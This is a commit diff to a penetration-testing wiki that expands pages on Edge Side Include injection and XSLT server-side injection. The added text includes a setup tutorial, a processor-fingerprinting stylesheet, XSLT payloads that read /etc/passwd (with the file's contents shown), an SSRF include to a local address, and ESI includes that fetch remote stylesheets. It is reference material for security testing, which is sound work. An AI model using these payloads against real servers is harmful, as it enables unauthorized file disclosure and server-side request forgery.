GitBook: [master] 478 pages modified

2021-06-07 11:31:39 +00:00 · 2021-06-07 11:31:39 +00:00 · d97b40a1bd
commit d97b40a1bd
parent 2698f73ac2
2 changed files with 163 additions and 4 deletions
--- a/pentesting-web/server-side-inclusion-edge-side-inclusion-injection.md
+++ b/pentesting-web/server-side-inclusion-edge-side-inclusion-injection.md
@ -100,7 +100,7 @@ This will send debug information included in the response:

 ### ESI + XSLT = XXE

-It is also possible to add _eXtensible Stylesheet Language Transformations \(XSLT\)_ based ESI includes by specifying the `xslt` value to the _dca_ parameter. The following include will cause the HTTP surrogate to request the XML and XSLT file. The XSLT file is then used to filter the XML file. This XML file can be used to perform _XML External Entity \(XXE\)_ attacks. This allows attackers to perform SSRF attacks, which is not very useful since this must be performed through ESI includes, which is an SSRF vector itself. External DTDs are not parsed since the underlying library \(Xalan\) has no support for it. This means we cannot extract local files.
+It is also possible to add ****_**eXtensible Stylesheet Language Transformations \(XSLT\)**_ ****based ESI includes by specifying the `xslt` value to the _dca_ parameter. The following include will cause the HTTP surrogate to request the XML and XSLT file. The XSLT file is then used to filter the XML file. This XML file can be used to perform _XML External Entity \(XXE\)_ attacks. This allows attackers to perform SSRF attacks, which is not very useful since this must be performed through ESI includes, which is an SSRF vector itself. External DTDs are not parsed since the underlying library \(Xalan\) has no support for it. This means we cannot extract local files.

 ```markup
 <esi:include src="http://host/poc.xml" dca="xslt" stylesheet="http://host/poc.xsl" />
@ -114,6 +114,10 @@ The XSLT file:
 <foo>&xxe;</foo>
 ```

+Check the XSLT page:
+
+{% page-ref page="xslt-server-side-injection-extensible-stylesheet-languaje-transformations.md" %}
+
 ### References

 * [https://www.gosecure.net/blog/2018/04/03/beyond-xss-edge-side-include-injection/](https://www.gosecure.net/blog/2018/04/03/beyond-xss-edge-side-include-injection/)
--- a/pentesting-web/xslt-server-side-injection-extensible-stylesheet-languaje-transformations.md
+++ b/pentesting-web/xslt-server-side-injection-extensible-stylesheet-languaje-transformations.md
@ -7,6 +7,151 @@ The most used frameworks are: **Libxslt** \(Gnome\), **Xalan** \(Apache\) and **

 In order to exploit this kind of vulnerability you need to be able to store xsl tags in the server side and then access that content. An example of this kind of vulnerability can be found on [https://www.gosecure.net/blog/2019/05/02/esi-injection-part-2-abusing-specific-implementations/](https://www.gosecure.net/blog/2019/05/02/esi-injection-part-2-abusing-specific-implementations/)

+## Example - Tutorial
+
+```markup
+sudo apt-get install default-jdk
+sudo apt-get install libsaxonb-java
+```
+
+{% code title="xml.xml" %}
+```markup
+<?xml version="1.0" encoding="UTF-8"?>
+<catalog>
+    <cd>
+        <title>CD Title</title>
+        <artist>The artist</artist>
+        <company>Da Company</company>
+        <price>10000</price>
+        <year>1760</year>
+    </cd>
+</catalog>
+```
+{% endcode %}
+
+{% code title="xsl.xsl" %}
+```markup
+<?xml version="1.0" encoding="UTF-8"?>
+<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
+<xsl:template match="/">
+    <html>
+    <body>
+    <h2>The Super title</h2>
+    <table border="1">
+        <tr bgcolor="#9acd32">
+            <th>Title</th>
+            <th>artist</th>
+        </tr>
+        <tr>
+        <td><xsl:value-of select="catalog/cd/title"/></td>
+        <td><xsl:value-of select="catalog/cd/artist"/></td>
+        </tr>
+    </table>
+    </body>
+    </html>
+</xsl:template>
+</xsl:stylesheet>
+```
+{% endcode %}
+
+Execute:
+
+```bash
+$ saxonb-xslt -xsl:xsl.xsl xml.xml
+ 
+Warning: at xsl:stylesheet on line 2 column 80 of xsl.xsl:
+  Running an XSLT 1.0 stylesheet with an XSLT 2.0 processor
+<html>
+   <body>
+      <h2>The Super title</h2>
+      <table border="1">
+         <tr bgcolor="#9acd32">
+            <th>Title</th>
+            <th>artist</th>
+         </tr>
+         <tr>
+            <td>CD Title</td>
+            <td>The artist</td>
+         </tr>
+      </table>
+   </body>
+</html>
+```
+
+### Fingerprint
+
+{% code title="detection.xsl" %}
+```markup
+<?xml version="1.0" encoding="UTF-8"?>
+<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
+<xsl:output method="html"/>
+<xsl:template match="/">
+    <h2>XSLT identification</h2>
+    <b>Version:</b> 
+    <xsl:value-of select="system-property('xsl:version')"/><br/>
+    <b>Vendor:</b> <xsl:value-of select="system-property('xsl:vendor')" /><br/>
+    <b>Vendor URL:</b>
+    <xsl:value-of select="system-property('xsl:vendor-url')" /><br/>
+</xsl:template>
+</xsl:stylesheet>
+```
+{% endcode %}
+
+And execute
+
+```markup
+$saxonb-xslt -xsl:detection.xsl xml.xml 
+
+Warning: at xsl:stylesheet on line 2 column 80 of detection.xsl:
+  Running an XSLT 1.0 stylesheet with an XSLT 2.0 processor
+<h2>XSLT identification</h2><b>Version:</b>2.0<br><b>Vendor:</b>SAXON 9.1.0.8 from Saxonica<br><b>Vendor URL:</b>http://www.saxonica.com/<br>
+```
+
+### Read Local File
+
+{% code title="read.xsl" %}
+```markup
+<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:abc="http://php.net/xsl" version="1.0">
+<xsl:template match="/">
+<xsl:value-of select="unparsed-text('/etc/passwd', 'utf-8')"/>
+</xsl:template>
+</xsl:stylesheet>
+```
+{% endcode %}
+
+```markup
+$ saxonb-xslt -xsl:read.xsl xml.xml
+
+Warning: at xsl:stylesheet on line 1 column 111 of read.xsl:
+  Running an XSLT 1.0 stylesheet with an XSLT 2.0 processor
+<?xml version="1.0" encoding="UTF-8"?>root:x:0:0:root:/root:/bin/bash
+daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
+bin:x:2:2:bin:/bin:/usr/sbin/nologin
+sys:x:3:3:sys:/dev:/usr/sbin/nologin
+sync:x:4:65534:sync:/bin:/bin/sync
+games:x:5:60:games:/usr/games:/usr/sbin/nologin
+man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
+lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
+```
+
+### SSRF
+
+```markup
+<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:abc="http://php.net/xsl" version="1.0">
+<xsl:include href="http://127.0.0.1:8000/xslt"/>
+<xsl:template match="/">
+</xsl:template>
+</xsl:stylesheet>
+```
+
+### Versions
+
+There might be more or less functions depending on the XSLT version used:
+
+* [https://www.w3.org/TR/xslt-10/](https://www.w3.org/TR/xslt-10/)
+* [https://www.w3.org/TR/xslt20/](https://www.w3.org/TR/xslt20/)
+* [https://www.w3.org/TR/xslt-30/](https://www.w3.org/TR/xslt-30/)
+
 ## Fingerprint

 Upload this and take information
@ -39,7 +184,7 @@ Upload this and take information
 </xsl:stylesheet>
 ```

-## External HTTP Request
+## SSRF

 ```markup
 <esi:include src="http://10.10.10.10/data/news.xml" stylesheet="http://10.10.10.10//news_template.xsl">
@ -91,7 +236,17 @@ Upload this and take information

 ## Read files

-### **Internal**
+### **Internal - PHP**
+
+```markup
+<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:abc="http://php.net/xsl" version="1.0">
+<xsl:template match="/">
+<xsl:value-of select="unparsed-text('/etc/passwd', ‘utf-8')"/>
+</xsl:template>
+</xsl:stylesheet>
+```
+
+### **Internal - XXE**

 ```markup
 <?xml version="1.0" encoding="utf-8"?>
@ -122,7 +277,7 @@ Upload this and take information
 </xsl:template>
 ```

-### **Internal \(PHP\)**
+### **Internal \(PHP-function\)**

 ```markup
 <?xml version="1.0" encoding="utf-8"?>